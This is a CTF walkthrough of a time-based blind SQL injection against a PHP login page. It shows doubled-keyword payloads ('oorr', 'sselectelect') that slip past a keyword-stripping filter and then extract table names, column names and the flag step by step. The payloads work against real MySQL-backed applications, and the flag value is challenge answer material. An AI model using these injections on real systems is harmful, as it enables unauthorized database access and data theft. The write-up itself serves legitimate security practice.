An sql blind injection practice
preface
The title is a ctf web penetration question. You need to penetrate into the database, get the correct flag and submit it.
1. Preliminary observation
Casually enter the account and password, and it is found that a php code is echoed on the page. It seems that it is necessary to construct the string of sql injection to bypass the waf function detection to realize sql injection.
The waf function will replace keywords such as select or with blank characters to prevent sql injection.
2. View request
Fiddler grabs the packet and looks at the network request. It can be found that this is a post request based on the form
3. Guess and solve the closing mode
Construction submission parameters
' oor 1=1 #
The page responds normally. It seems that the closing method is not a single quotation mark. The purpose of writing or as oorr here is to bypass waf interception. The waf function replaces or with "". After replacement, it is still or, so it bypasses interception.
Construction submission parameters
" oorr 1=1 #
It is found that the page content becomes admin 35f1eeffabbb28113be22ca2eb810d6a
Try to log in with this account password and find that it is useless at all. It seems that it is not so simple.
We can only follow the conventional blind injection method step by step.
4. Upper Burp Suite
5. Time blind database name length
222 " oorr if(length(database())=§len§,sleep(5),1) #
After clicking start attack, you can see that the database name is 7 characters long
6. Name of time blind injection database
222 " oorr if(ascii(substring(database(),§index§,1))=§value§,sleep(5),1)#
After sorting the length, the database name is easysql
7. Guess the number of database tables
222 " oorr if((sselectelect count(table_name) frroom infoorrmation_schema.tables wwherehere table_schema=database() )=§len§,sleep(2),1)#
The number of database tables obtained is 2
7. Time blind note the length of the first table name
Get a length of 4
222 " oorr if(length(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 0,1),1))=§len§,sleep(5),1)#
8. Time blind note the length of the second table name
Get a length of 5
222 " oorr if(length(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 1,2),1))=§len§,sleep(5),1)#
9. Time blind annotation of the first table name
Get the table name flag
222 " oorr if(ascii(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 0,1),§index§,1))=§value§,sleep(5),1)#
10. Time blind injection of the second table name
222 " oorr if(ascii(substr((sselectelect table_name frroom infoorrmation_schema.tables wwherehere table_schema=database() limit 1,2),§index§,1))=§value§,sleep(5),1)#
11. Number of time blind flag table fields
Because our final result is to get the correct flag and guess that the flag is stored in the flag table, we next infiltrate the flag table.
First, guess the number of fields in the flag table, and the number of fields is 2
222 " oorr if((sselectelect count(column_name) frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag')=§len§,sleep(5),1) #
12. Length of the first field name of the time blind flag table
The obtained length is: 2
222 " oorr if(length(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 0,1),1))=§len§,sleep(1),1)#
13. Name of the first field in the time blind flag table
Get the first field named id
222 " oorr if(ascii(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 0,1),§index§,1))=§value§,sleep(1),1)#
14. Name of the second field in the time blind flag table
Get the second field named flag
222 " oorr if(ascii(substr((sselectelect column_name frroom infoorrmation_schema.columns wwherehere table_name= 'fflaglag' limit 1,2),§index§,1))=§value§,sleep(1),1)#
15. Number of time blind flag table records
There is only one record in the table
222 " oorr if((sselectelect count(*) frroom fflaglag)=§count§,sleep(3),1)#
16. Data length of flag field in time blind note flag table
The length of the flag value is 38 bits
222 " oorr if(length(substr((sselectelect fflaglag frroom fflaglag limit 0,1),1))=§len§,sleep(3),1)#
17. Time blind injection flag value
flag{d7edeb1366bd99aa12d109c99267e37e}
222 " oorr if(ascii(substr((sselectelect fflaglag frroom fflaglag limit 0,1),§index§,1))=§value§,sleep(3),1)#
